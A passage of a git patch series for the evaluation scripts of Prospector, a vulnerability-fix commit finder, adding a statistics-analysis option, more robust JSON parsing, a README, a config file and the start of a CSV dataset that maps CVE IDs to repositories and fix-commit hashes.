-4,7 +4,11 @@ import signal import sys -from evaluation.analyse import analyze_prospector, analyze_results_rules +from evaluation.analyse import ( + analyse_statistics, + analyze_prospector, + analyze_results_rules, +) from evaluation.dispatch_jobs import dispatch_prospector_jobs, parallel_execution @@ -50,6 +54,13 @@ def parse_cli_args(args): help="Rules analysis option", ) + parser.add_argument( + "-s", + "--stats", + action="store_true", + help="Analyse the statistics field saved in each Prospector report.", + ) + parser.add_argument( "-f", "--folder", @@ -76,18 +87,31 @@ def parse_cli_args(args): def main(argv): args = parse_cli_args(argv) + + # Run Prospector containerised if args.execute and not args.analyze and not args.parallel: # get_full_commit_ids(args.input) # return dispatch_prospector_jobs(args.input, args.cve) + + # Run Prospector in parallel elif args.execute and not args.analyze and args.parallel: while not parallel_execution(args.input): pass # parallel_execution(args.input) - elif args.analyze and not args.rules and not args.execute: + + # analysis of Prospector report + elif args.analyze and not args.rules and not args.execute and not args.stats: analyze_prospector(args.input) + + elif args.analyze and args.stats and not args.rules and not args.execute: + analyse_statistics(args.input) + + # analysis of rules elif args.analyze and args.rules and not args.execute: analyze_results_rules(args.input) + + # Cannot choose both analyse and execute, stop here. elif args.analyze and args.execute: sys.exit("Choose either to execute or analyze") From ab6f22b5fb966316a3ba19738042cdf3a379a6ec Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 17 Jul 2024 13:39:46 +0000 Subject: [PATCH 034/130] makes analysis code more robust to JSON report files missing fields --- prospector/evaluation/analyse.py | 111 ++++++++++++++++--------- prospector/evaluation/dispatch_jobs.py | 18 ++-- 2 files changed, 86 insertions(+), 43 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 91131878c..d9ec8102a 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -1,6 +1,7 @@ import csv import json import re +import sys from collections import defaultdict from typing import Dict, List, Tuple from urllib.parse import urlparse @@ -33,7 +34,9 @@ def analyze_results_rules(dataset_path: str): for itm in dataset: try: - r, i, v, id = check_report_get_rules(dataset_path[:-4], itm[0], itm[4]) + r, i, v, id = check_report_get_rules( + dataset_path[:-4], itm[0], itm[4] + ) if r is not None: count += 1 table[itm[0]] = [id, v, r, itm] @@ -79,7 +82,9 @@ def analyze_results_rules(dataset_path: str): print(count) for k, v in table.items(): if "CVE_ID_IN_LINKED_ISSUE" in v[2]: - print(f"{v[3][0]};{v[3][1]};{v[3][2]};{v[3][3]};{v[3][4]};{v[3][5]}") + print( + f"{v[3][0]};{v[3][1]};{v[3][2]};{v[3][3]};{v[3][4]};{v[3][5]}" + ) # print(f"{k}: {v[3]}/commit/{v[0]}") @@ -257,18 +262,18 @@ def analyze_prospector(filename: str): # noqa: C901 print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") elif not is_fix and not exists and position < 0: skipped += 1 - # print( - # ",".join( - # results["not_reported"] - # | results["not_found"] - # | results["false_positive"] - # | results["low_confidence"] - # | results["medium_confidence"] - # | results["CVE_ID_IN_LINKED_ISSUE"] - # | results["CROSS_REFERENCE"] - # | results["CVE_ID_IN_MESSAGE"] - # ) - # ) + print( + ",".join( + results["not_reported"] + | results["not_found"] + | results["false_positive"] + | results["low_confidence"] + | results["medium_confidence"] + | results["CVE_ID_IN_LINKED_ISSUE"] + | results["CROSS_REFERENCE"] + | results["CVE_ID_IN_MESSAGE"] + ) + ) total = len(dataset) - skipped rulescount = dict(sorted(rulescount.items())) @@ -322,7 +327,9 @@ def analyze_prospector(filename: str): # noqa: C901 # ) # total_check += len(value) - yearly_timestamps = {k: v for k, v in yearly_timestamps.items() if len(v) > 30} + yearly_timestamps = { + k: v for k, v in yearly_timestamps.items() if len(v) > 30 + } # df = pd.DataFrame(dict([(k, pd.Series(v)) for k, v in timestamps.items()])) # ax = sns.violinplot(df, inner="box") @@ -507,10 +514,14 @@ def check_report(dataset, cve, fixing_commits): if is_fixing_commit(commit, fixing_commits): if index == 0: score_first = -1 - return get_commit_info(commit, index, score_first, score_next) + return get_commit_info( + commit, index, score_first, score_next + ) for index, commit in enumerate(data["commits"]): - commit_info = get_non_fixing_commit_info(commit, index, score_first) + commit_info = get_non_fixing_commit_info( + commit, index, score_first + ) if commit_info: return commit_info @@ -562,13 +573,21 @@ def process_json_report(dataset, cve, commits): None, ] current[3] = len( - [k for k, v in processed_commits.items() if v[0] == current[2]] + [ + k + for k, v in processed_commits.items() + if v[0] == current[2] + ] ) if i > 0: - current[4] = sum_relevances(data["commits"][0]["matched_rules"]) + current[4] = sum_relevances( + data["commits"][0]["matched_rules"] + ) r_next = 0 for j in range(i, -1, -1): - r_next = sum_relevances(data["commits"][j]["matched_rules"]) + r_next = sum_relevances( + data["commits"][j]["matched_rules"] + ) if r_next > current[2]: current[5] = r_next break @@ -599,7 +618,10 @@ def analyze_rules_usage(dataset_path: str, cve: str = ""): rules[rule["id"]] = 1 sorted_rules = { - k: v for k, v in sorted(rules.items(), key=lambda item: item[1], reverse=True) + k: v + for k, v in sorted( + rules.items(), key=lambda item: item[1], reverse=True + ) } print(f"\nTotal commits: {commit_count}") print(f"Total cves: {cve_count}\n") @@ -705,7 +727,7 @@ def analyse_statistics(filename: str): # noqa: C901 file = INPUT_DATA_PATH + filename + ".csv" dataset = load_dataset(file) - missing = [] + missing, files_with_no_commits = [], [] skipped = 0 repo_times, cc_times, total_cc_times = [], [], [] @@ -715,7 +737,9 @@ def analyse_statistics(filename: str): # noqa: C901 # Each itm has ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" try: - repo_time, avg_cc_time, total_cc_time = process_llm_statistics(filepath) + repo_time, avg_cc_time, total_cc_time = process_llm_statistics( + filepath + ) repo_times.append(repo_time) cc_times.append(avg_cc_time) @@ -724,6 +748,12 @@ def analyse_statistics(filename: str): # noqa: C901 except FileNotFoundError: missing.append(itm[0]) skipped += 1 + + except ValueError: + files_with_no_commits.append(itm[0]) + skipped += 1 + + finally: continue avg_repo_time = sum(repo_times) / len(repo_times) @@ -760,21 +790,26 @@ def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: with open(filepath, "r") as file: data = json.load(file) - llm_stats = data["processing_statistics"]["LLM"]["llm"]["llm_service"][ - "LLMService" - ] + try: + llm_stats = data["processing_statistics"]["LLM"]["llm"][ + "llm_service" + ]["LLMService"] + + total_cc_time = sum(llm_stats["classify_commit"]["execution time"]) - total_cc_time = sum(llm_stats["classify_commit"]["execution time"]) + avg_cc_time = total_cc_time / len( + llm_stats["classify_commit"]["execution time"] + ) - avg_cc_time = total_cc_time / len( - llm_stats["classify_commit"]["execution time"] - ) + return ( + llm_stats["get_repository_url"]["execution time"][0], + avg_cc_time, + total_cc_time, + ) - return ( - llm_stats["get_repository_url"]["execution time"][0], - avg_cc_time, - total_cc_time, - ) + except Exception: + print(f"Did not have expected JSON fields: {filepath}.") + raise ValueError def get_cc_num_commits(filepath): @@ -783,9 +818,9 @@ def get_cc_num_commits(filepath): data = json.load(file) num = len( - data["processing_statistics"]["LLM"]["llm"]["llm_service"]["LLMService"][ - "classify_commit" - ]["execution time"] + data["processing_statistics"]["LLM"]["llm"]["llm_service"][ + "LLMService" + ]["classify_commit"]["execution time"] ) return num diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index f02697cb2..b59ea8819 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -47,7 +47,9 @@ def get_full_commit_ids(dataset_path: str): if commit_id is not None: commits.append(commit_id) - print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(commits)};{itm[5]}") + print( + f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(commits)};{itm[5]}" + ) def check_version_to_tag_matching(dataset_path: str): @@ -247,7 +249,9 @@ def parallel_execution(filename: str): "silent": True, } for cve in dataset - if not os.path.exists(f"empirical_study/datasets/{filename}/{cve[0]}.json") + if not os.path.exists( + f"empirical_study/datasets/{filename}/{cve[0]}.json" + ) ] if len(inputs) == 0: return True @@ -270,10 +274,14 @@ def execute_prospector_wrapper(kwargs): del kwargs["filename"] r, a = prospector(**kwargs) if r is not None: - generate_report(r, a, "json", f"empirical_study/datasets/{filename}/{a.cve_id}") + generate_report( + r, a, "json", f"empirical_study/datasets/{filename}/{a.cve_id}" + ) -def run_prospector_and_generate_report(vuln_id, v_int, report_type: str, output_file): +def run_prospector_and_generate_report( + vuln_id, v_int, report_type: str, output_file +): """Call the prospector() and generate_report() functions. This also creates the LLMService singleton so that it is available in the context of the job. """ @@ -303,7 +311,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[:50] + # dataset = dataset[:50] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: From fe188963f57f4a751c5bd8eadff7fbf50e878791 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 17 Jul 2024 13:42:04 +0000 Subject: [PATCH 035/130] adds seaborn and matplotlib to dev requirements --- prospector/requirements-dev.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/prospector/requirements-dev.txt b/prospector/requirements-dev.txt index 54637c9f7..f0e457c3a 100644 --- a/prospector/requirements-dev.txt +++ b/prospector/requirements-dev.txt @@ -1,9 +1,11 @@ autopep8 black +flake8 +matplotlib pylint pytest pytest-cov pycodestyle -flake8 -requests-mock pre-commit +requests-mock +seaborn \ No newline at end of file From f18c644269331982b2a1efad7b9d7f2e4b7fc7d0 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 17 Jul 2024 14:14:24 +0000 Subject: [PATCH 036/130] logs to console --- prospector/evaluation/analyse.py | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index d9ec8102a..add520cf3 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -746,10 +746,12 @@ def analyse_statistics(filename: str): # noqa: C901 total_cc_times.append(total_cc_time) except FileNotFoundError: + print(f"Skipped {itm[0]}.json because file could not be found.") missing.append(itm[0]) skipped += 1 except ValueError: + print(f"Skipped {itm[0]}.json.") files_with_no_commits.append(itm[0]) skipped += 1 @@ -786,7 +788,15 @@ def analyse_statistics(filename: str): # noqa: C901 def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: - "Returns the LLM statistics saved in Prospector's JSON report." + """Extracts the LLM statistics saved in Prospector's JSON report. + + Params: + filepath (str): The filepath to the Prospector report in JSON format. + + Returns: + Tuple[float, float, float]: (time for getting repository URL, avg. + time for one commit classification, sum of all commit classification times) + """ with open(filepath, "r") as file: data = json.load(file) From 153ba2e1e1caa2e8763b9ec917c5927a13754606 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 18 Jul 2024 14:14:30 +0000 Subject: [PATCH 037/130] adds readme --- prospector/evaluation/README.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 prospector/evaluation/README.md diff --git a/prospector/evaluation/README.md b/prospector/evaluation/README.md new file mode 100644 index 000000000..29c0f1092 --- /dev/null +++ b/prospector/evaluation/README.md @@ -0,0 +1,3 @@ +# Evaluate Prospector + +This folder contains code to run the evaluation of Prospector. \ No newline at end of file From 5d9fa021d0fe8fdd9bd615f677bd9c9fdff9880e Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 18 Jul 2024 14:51:13 +0000 Subject: [PATCH 038/130] bundels run variables in config.yaml and adds readme --- prospector/evaluation/README.md | 40 ++++++++++++++++++++++++++++++- prospector/evaluation/config.yaml | 8 +++++++ 2 files changed, 47 insertions(+), 1 deletion(-) create mode 100644 prospector/evaluation/config.yaml diff --git a/prospector/evaluation/README.md b/prospector/evaluation/README.md index 29c0f1092..a0bbdefa8 100644 --- a/prospector/evaluation/README.md +++ b/prospector/evaluation/README.md @@ -1,3 +1,41 @@ # Evaluate Prospector -This folder contains code to run the evaluation of Prospector. \ No newline at end of file +This folder contains code to run the evaluation of Prospector. + +## Settings + +Just like when running Prospector, there is also a configuration file for the evaluation code in this folder: `evaluation/config.yaml`. +This allows you to select data and set Prospector up in a certain way in one central place. + +### How should Prospector be run? + +Prospector can either be run containerised or not, set this with the `run_containerised` variable in `config.yaml`. + +### Which CVEs should Prospector be run on? + +The evaluation code expects data input in the form of CSV files with the following columns: `(CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS)`. + +First, if you have your input data saved somewhere else than `/evaluation/data/input/`, please change the `input_data_path` accordingly. +Do not put the datafile into `input/`, but rather in its own folder with a descriptive name, such as `steady-dataset/`. You can specify +which dataset you would want to use when running the CL command for evaluation [(List of Command Line Options)](#command-line-options). + + +## Run Evaluation + +### Dispatch Prospector Jobs +To dispatch several Prospector jobs to the queue, use: + +```bash +python3 evaluation/run_multiple -i -e +``` + +### List of Command Line Options + +* `-i` or `--input`: Specify the input file (likely a CSV with vulnerability data) +* `-e` or `--execute`: Run Prospector on the input data +* `-a` or `--analyze`: Analyze the results of previous Prospector runs +* `-o` or `--output`: Specify an output file (for certain operations) +* `-r` or `--rules`: Perform rules analysis +* `-f` or `--folder`: Specify a folder to analyze +* `-c` or `--cve`: Specify a particular CVE to analyze +* `-p` or `--parallel`: Run in parallel on multiple CVEs \ No newline at end of file diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml new file mode 100644 index 000000000..5e019ec51 --- /dev/null +++ b/prospector/evaluation/config.yaml @@ -0,0 +1,8 @@ +# Input Data +input_data_path: evaluation/data/input # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) + +# Prospector Reports +prospector_reports_path: evaluation/data/reports # reports generated by Prospector, sorted by names of input datasets + +# Prospector settings +run_containerised: True \ No newline at end of file From 5043ce6a6f20b973891ee5be775e907838316ebb Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 18 Jul 2024 14:51:34 +0000 Subject: [PATCH 039/130] this is the dataset used in D6.3 --- ...acer_dataset_correct_full_unsupervised.csv | 1320 +++++++++++++++++ 1 file changed, 1320 insertions(+) create mode 100644 prospector/evaluation/data/input/tracer_dataset_correct_full_unsupervised.csv diff --git a/prospector/evaluation/data/input/tracer_dataset_correct_full_unsupervised.csv b/prospector/evaluation/data/input/tracer_dataset_correct_full_unsupervised.csv new file mode 100644 index 000000000..c5f208544 --- /dev/null +++ b/prospector/evaluation/data/input/tracer_dataset_correct_full_unsupervised.csv @@ -0,0 +1,1320 @@ +ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS +CVE-2009-0217;https://github.com/mono/mono;None:None;False;b79738dc7f734a78039567ea35f4e6a7d319a227,e2be4afec1d41aacd7c0a35605e369a55c4fe3a6,939994df00fc3e1372b9dc1243e261e2f6c6c133,c20551c1942db667672b36a07856467caace2d92,8bb489774f42a734947859a1742ee5710efd9b49,c48fa75d0c8f8e16a554de988cbadcb298fce013,cbfbf2f522399692d0edf7741746e300453338ca,3b1cee23d6f2f69f8444a5a1def4051028abff5f,14846e6f2f0c8e95b3eec525ee9367bcd0; +CVE-2010-0156;https://github.com/puppetlabs/puppet;None:None;False;0aae57f91dc69b22fb674f8de3a13c22edd07128,6111ba80f2c6f6d1541af971f565119e6e03d77d; +CVE-2010-0684;https://github.com/apache/activemq;None:None;False;1f464b9412e1b1c08d40c8ffac40edd52731da48,fed39c3619825bd92990cf1aa7a4e85119e00a6e,2895197d0dad246757d8d1d9eea181cbf0543ae9,9dc43f3ffe85c9c56faee235a21f23bfceb865c8; +CVE-2010-2076;https://github.com/apache/cxf;None:None;False;63a0a674a46aa24bf020bcb3d9e71bc0ad130c64,fec9e63fda69a3ef21679cd811efa2a0c100ce95; +CVE-2010-2245;https://github.com/apache/attic-wink;None:None;False;531771e5b2bf2f470fe728efe25e471d3b23659f; vulnerable tag is fixed +CVE-2010-4534;https://github.com/django/django;None:None;False;17084839fd7e267da5729f2a27753322b9d415a0,85207a245bf09fdebe486b4c7bbcb65300f2a693,732198ed5c2a127249970e0cd4218d093a38e9a2; +CVE-2010-4535;https://github.com/django/django;None:None;False;6819be1ea17ace34ae3a5c31ab0be960e99fcb85,d5d8942a160685c403d381a279e72e09de5489a9,7f8dd9cbac074389af8d8fd235bf2cb657227b9a; +CVE-2010-5142;https://github.com/chef/chef;None:None;False;2810e43ca6c05046a9ba1392fd8163c3e617ddc1,8d6de424c7ed977b3c7f232b585ef7d63647ac51; +CVE-2010-5312;https://github.com/jquery/jquery-ui;None:None;False;7e9060c109b928769a664dbcc2c17bd21231b6f3; +CVE-2011-1772;https://github.com/apache/struts;None:None;False;885ab3459e146ff830d1f7257f809f4a3dd4493a; vulnerable tag is fixed +CVE-2011-1950;https://github.com/plone/plone.app.users;None:None;False;282ca1eb510aea43bcddf6ad005446074d29efc3; +CVE-2011-2730;https://github.com/spring-projects/spring-framework;None:None;False;9772eb8410e37cd0bdec0d1b133218446c778beb,62ccc8dd7e645fb91705d44919abac838cb5ca3f; fixed tag is vulnerable v3.2.0.RELEASE is the first containing the fix in theory +CVE-2011-2732;https://github.com/spring-projects/spring-security;None:None;False;f5fbda42e5f494f1a8aa96a0f8b35d60a4f57556,a087e828a63edf0932e4eecf174cf816cbe6a58a,5238ba0e2615ef733a906b264c6c06a4446a886b; +CVE-2011-2765;https://github.com/irmen/Pyro3;None:None;False;554e095a62c4412c91f981e72fd34a936ac2bf1e; +CVE-2011-2929;https://github.com/rails/rails;None:None;False;5f94b93279f6d0682fafb237c301302c107a9552,e0c03f8a2e727619c1eb1822d100d8c920d8bf12,09ad48f22e0b32b6485bc122f7f220045aed1198; +CVE-2011-2930;https://github.com/rails/rails;None:None;False;8a39f411dc3c806422785b1f4d5c7c9d58e4bf85,f9b642cb15d37c9fc76c98ba4c11fa181b730178,fb4747bcf1659a94d76ac221d66ce44148ca7b49,6b46d655978ace0a6cfa6ad8b814d97c86a8830f; +CVE-2011-2931;https://github.com/rails/rails;None:None;False;586a944ddd4d03e66dea1093306147594748037a,3480d97b6c9f657ca1d0f11ac1e3e17baf84cdb2,66c3e31dcf314ab0fcabe717576d0b606c685d0e,60f783d9cedb151230074c216b338267e288d72d; +CVE-2011-2932;https://github.com/rails/rails;None:None;False;bfc432574d0b141fd7fe759edfe9b6771dd306bd,a19ee5cfd35fe85fd065be30de5af6b20363b682; +CVE-2011-3186;https://github.com/rails/rails;None:None;False;11dafeaa7533be26441a63618be93a03869c83a9; +CVE-2011-3848;https://github.com/puppetlabs/puppet;None:None;False;fe2de817b43a427a3c6fd629c5e13949b222ac34,c275a518d10bc9ef87d330c052cdc3d6f4241942,47135fbea8004f49c3255ae2052cb2357b325300; +CVE-2011-3869;https://github.com/puppetlabs/puppet;None:None;False;7d4c169df84fc7bbeb2941bf995a63470f71bdbd,2775c21ae48e189950dbea5e7b4d1d9fa2aca41c,e7a69952c052e89acc5b57a51ac0680a7a9a5977; +CVE-2011-3870;https://github.com/puppetlabs/puppet;None:None;False;b29b1785d543a3cea961fffa9b3c15f14ab7cce0,88512e880bd2a03694b5fef42540dc7b3da05d30; +CVE-2011-3871;https://github.com/puppetlabs/puppet;None:None;False;d76c30935460ded953792dfe49f72b8c5158e899,343c7bd381b63e042d437111718918f951d9b30d; +CVE-2011-3872;https://github.com/puppetlabs/puppet;None:None;False;94345ebac6d79a890efc5f49e136c4f76ddda3ef,bab9310d2800dd3c24e002f9d85c808ee38c9d3c,e4ee7947fd58e4fc49c5bce484cce7b5f60470ae,9ee12151e9c83d2b477ea5b04dd7d52e749a6992; +CVE-2011-3923;https://github.com/apache/struts;None:None;False;2c1eb6bb57f90db7287fc3ed0086793d0a43fe9e; +CVE-2011-4030;https://github.com/plone/Products.CMFEditions;None:None;False;d55add52e5900967c8cc78becc6790048f02015b; +CVE-2011-4104;https://github.com/django-tastypie/django-tastypie;None:None;False;e8af315211b07c8f48f32a063233cc3f76dd5bc2,be245106125961a322f935195c1d3bca6f978bfe; +CVE-2011-4461;https://github.com/eclipse/jetty.project;None:None;False;085c79d7d6cfbccc02821ffdb64968593df3e0bf; +CVE-2011-4838;https://github.com/jruby/jruby;None:None;False;f007944b459e7c5e33b8296433d8b9d704bf02cc,cc77504eda2546a36d3ca45d30e9dc3cc7a38bf6,c1c9f95ed29cb93806fbc90e9eaabb9c406581e5; +CVE-2011-5036;https://github.com/rack/rack;None:None;False;5b9d09a81a9fdc9475f0ab0095cb2a33bf2a8f91,e8fb5045fd9a28386425975b57414d46471a5263,09c5e53f11a491c25bef873ed146842f3cd03228,bf4b55ccfbe53f967d0bd52807eeb499ff4f9654; +CVE-2011-5097;https://github.com/chef/chef;None:None;False;a4ea6edab2fecb922f999cffb0daa04eeeec7a26,4402493061cdce76495d2408c8a9331c530c6cbf; +CVE-2011-5098;https://github.com/chef/chef;None:None;False;33f0e9c58bbf047e1b401a834f3abfe72d9a8947,7a09597360c256f6164047b62782a2a1e0a3d68a; +CVE-2012-0392;https://github.com/apache/struts;None:None;False;b4265d369dc29d57a9f2846a85b26598e83f3892,5f54b8d087f5125d96838aafa5f64c2190e6885b; vulnerable tag is fixed +CVE-2012-0394;https://github.com/apache/struts;None:None;False;b4265d369dc29d57a9f2846a85b26598e83f3892,5f54b8d087f5125d96838aafa5f64c2190e6885b; vulnerable tag is fixed +CVE-2012-0881;https://github.com/apache/xerces2-j;None:None;False;992b5d9c24102ad20330d36c0a71162753a37449; +CVE-2012-1054;https://github.com/puppetlabs/puppet;None:None;False;146953861e007a91545fdbd0ea59ab3509326e09,0c967037ec8305aceb81f0a3e5d2969054bce2e2; +CVE-2012-1098;https://github.com/rails/rails;None:None;False;9435f5a479317458c558ae743b7d876dd5a5db20,d1fc35fe196ee2913bc34e5c581a5284610d05d1,c60c1c0812d5eb55e7024db350f8bc5b6729f7fe; +CVE-2012-1099;https://github.com/rails/rails;None:None;False;1be2bbec310ffe94061cca7ba0e3c1a478af03af,7b73913701ff41981d166ca457e41690aac3bce3,5b4082fddf3412aef6c085fbb2a13fd3bbc75f4e; +CVE-2012-1109;https://github.com/pediapress/mwlib;None:None;False;aa987c281c10e29f26aa0faa21c04f3bb1167fde; +CVE-2012-1176;https://github.com/pediapress/pyfribidi;None:None;False;d2860c655357975e7b32d84e6b45e98f0dcecd7a; +CVE-2012-1906;https://github.com/puppetlabs/puppet;None:None;False;c51447dfa81c9751fdc7663e0e91a9c9238abcaa,46e8dc06aa31426ec3bf5203e46107d72a9ba398; +CVE-2012-1986;https://github.com/puppetlabs/puppet;None:None;False;0d6d29933e613fe177e9235415919a5428db67bc,568ded50ec6cc498ad32ff7f086d9f73b5d24c14; +CVE-2012-1987;https://github.com/puppetlabs/puppet;None:None;False;91e7ce478649490d87684661f79d70b5ca46ddd0,568ded50ec6cc498ad32ff7f086d9f73b5d24c14,0d6d29933e613fe177e9235415919a5428db67bc; +CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e; +CVE-2012-2139;https://github.com/mikel/mail;None:None;False;29aca25218e4c82991400eb9b0c933626aefc98f,ac56f03bdfc30b379aeecd4ff317d08fdaa328c2; +CVE-2012-2378;https://github.com/apache/cxf;None:None;False;9bb4612d3352ef3e3292fdce25e3c70b43d63c6f; +CVE-2012-2379;https://github.com/apache/cxf;None:None;False;440528d928be1e2030e7227b958c9c072847d9b2,4500bf901cb2a7312291b6663045f28a95d2a0c4; +CVE-2012-2417;https://github.com/Legrandin/pycrypto;None:None;False;9f912f13df99ad3421eff360d6a62d7dbec755c2; +CVE-2012-2660;https://github.com/rails/rails;None:None;False;060c91cd59ab86583a8f2f52142960d3433f62f5,5b83bbfab7d5770ed56366d739ff62ac70425008,dff6db18840e2fd1dd3f3e4ef0ae7a9a3986d01d; +CVE-2012-2661;https://github.com/rails/rails;None:None;False;9340f89849606dba02f44038171f3837f883fd4e,99f030934eb8341db333cb6783d0f42bfa57358f,b71d4ab9d7d61ebe3411a8754e9fe93d3587704e,71f7917c553cdc9a0ee49e87af0efb7429759718,176af7eff2e33b331c92febbeda98123da1151f3,8355abf153615a717c0d0e4a58b2bfca39b35025,cc2903da9f13c26ba3d94c149f31d4c53b94b2ed; +CVE-2012-3366;https://github.com/Bcfg2/bcfg2;None:None;False;a524967e8d5c4c22e49cd619aed20c87a316c0be; +CVE-2012-3408;https://github.com/puppetlabs/puppet;None:None;False;ab9150baa1b738467a33b01df1d90e076253fbbd; +CVE-2012-3451;https://github.com/apache/cxf;None:None;False;deeeaa95a861b355068ca6febc7aa02a4a8c51e5,878fe37f0b09888a42005fedc725ce497b5a694a,7230648f96573820d5bfa82c92c637391b448897,9c70abe28fbf2b4c4df0b93ed12295ea5a012554; +CVE-2012-3458;https://github.com/bbangert/beaker;None:None;False;91becae76101cf87ce8cbfabe3af2622fc328fe5; +CVE-2012-3536;https://github.com/apache/james-hupa;None:None;False;aff28a8117a49969b0fc8cc9926c19fa90146d8d; +CVE-2012-3865;https://github.com/puppetlabs/puppet;None:None;False;d80478208d79a3e6d6cb1fbc525e24817fe8c4c6,554eefc55f57ed2b76e5ee04d8f194d36f6ee67f; +CVE-2012-3867;https://github.com/puppetlabs/puppet;None:None;False;f3419620b42080dad3b0be14470b20a972f13c50,bd2820ec6ee8a45f57fcc57f79dddde0062cdca7,4d7c9fd9f65c6daaf47515d2faec90b448e3821d,dfedaa5fa841ccf335245a748b347b7c7c236640,0144e687b663a9ae170a4cdb55f8dcc1571128ea,9607bd784b2f04b759932d36e843ba42d82635f1; +CVE-2012-4386;https://github.com/apache/struts;None:None;False;a1ca307981b0930d1687ed89f0b7305af79da0f3,1081c52be93abfd2f33ba8453c676e3edcedec8b; one commit outside time interval, other not included in the tag, use STRUTS_2_3_4_1 +CVE-2012-4387;https://github.com/apache/struts;None:None;False;87935af56a27235e9399308ee1fcfb74f8edcefa,80e03182d66d9e6ab18f9a9a9b3c42725a1c89e9; one commit outside time interval, other not included in the tag, use STRUTS_2_3_4_1 +CVE-2012-4449;https://github.com/apache/hadoop;None:None;False;2847693311ed09aa9440a6157f1a8c072d50ca2e,38ec8babda50215f984e5f5532ae70918af77378,d6b7f10438677507fbe1adadec28d219889eab5b; +CVE-2012-4520;https://github.com/django/django;None:None;False;9305c0e12d43c4df999c3301a1f0c742264a657e,b45c377f8f488955e0c7069cad3f3dd21910b071,92d3430f12171f16f566c9050c40feefb830a4a3; +CVE-2012-5055;https://github.com/spring-projects/spring-security;None:None;False;f5fc94e1be40f3a62dd5a8687e4cfd5fe2130dea,915b2acf73a75c4e51e67a3c7fd85f908df6259b,c076f0f2e190c73a17379d05935c2c81657adee9; +CVE-2012-5633;https://github.com/apache/cxf;None:None;False;1a6b532d53a7b98018871982049e4b0c80dc837c,db11c9115f31e171de4622149f157d8283f6c720,d99f96aa970d9f2faa8ed45e278a403af48757ae,e733c692e933a7f82424d3744aace9304cd5d4f6,94a98b3fe9c79e2cf3941acbbad216ba54999bc0; +CVE-2012-5812;https://github.com/ACRA/acra;None:None;False;fff732595164baf233d911386a3965dc516cf081; +CVE-2012-6550;https://github.com/zeroclipboard/zeroclipboard;None:None;False;51b67b6d696f62aaf003210c08542588222c4913; +CVE-2012-6662;https://github.com/jquery/jquery-ui;None:None;False;5fee6fd5000072ff32f2d65b6451f39af9e0e39e,f2854408cce7e4b7fc6bf8676761904af9c96bde; +CVE-2012-6684;https://github.com/jgarber/redcloth;None:None;False;cddd03b87fe75b6681405066796bf4ef88b37149,b9bec13a245481f577c032a7df88513869b4d1b1,2f6dab4d6aea5cee778d2f37a135637fe3f1573c,39700cb12b2b882b1bd4900877d18059c31bbe04; +CVE-2012-6685;https://github.com/sparklemotion/nokogiri;None:None;False;599856367150709497a3a03bee930bd76504d95d,6d93d73498ed061dec5967d6471cd544c2b99a71,b2c28099ecb736d2fac4446fb062cfa20dd81d6f; +CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; +CVE-2013-0248;https://github.com/apache/commons-fileupload;None:None;False;f874563307c1159ac634df67509d9859bca6ddb9; +CVE-2013-0256;https://github.com/ruby/rdoc;None:None;False;ffa87887ee0517793df7541629a470e331f9fe60; +CVE-2013-0262;https://github.com/rack/rack;None:None;False;6f237e4c9fab649d3750482514f0fde76c56ab30,8de3c1d9902f8e64a385f38cf5711f26ffba19db,5c9b0de3d30971a36e953e6fed24e648daf3a68c; +CVE-2013-0263;https://github.com/rack/rack;None:None;False;9a81b961457805f6d1a5c275d053068440421e11,feea59c1abacd455c222bfee67541b1078378929,dcc7e6fa5106e1e8129f4bbe21f7e1607dbf5197,26c8500e9c49a0e625e1bd8d7158cabdfa2e17ae,aeb1c8d0fa1bfa21357cfe6d55898dedf3b337e1,0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07,a227999ab37cde072fa75495cd1d3bbcbcaf0474,6c39dfc8e8d8d631730449516cddb9b23a24337c,8748d492a4bc966de51f2ddf8edd498a3fa0e122,93abac98b13a0afa90293e4ec597cf505d46a343,471a37c15ad1b8b4a3bdfb190a5bf7aa770ec6d3; +CVE-2013-0285;https://github.com/savonrb/nori;None:None;False;818f5263b1d597b603d46cbe1702cd2717259e32,d9b68667249b98776fb23ba9e9c548dc4b524709,2ca6f8603e406f884a8fcea6bc26f8f6bf168f40; +CVE-2013-0294;https://github.com/pyradius/pyrad;None:None;False;38f74b36814ca5b1a27d9898141126af4953bee5; 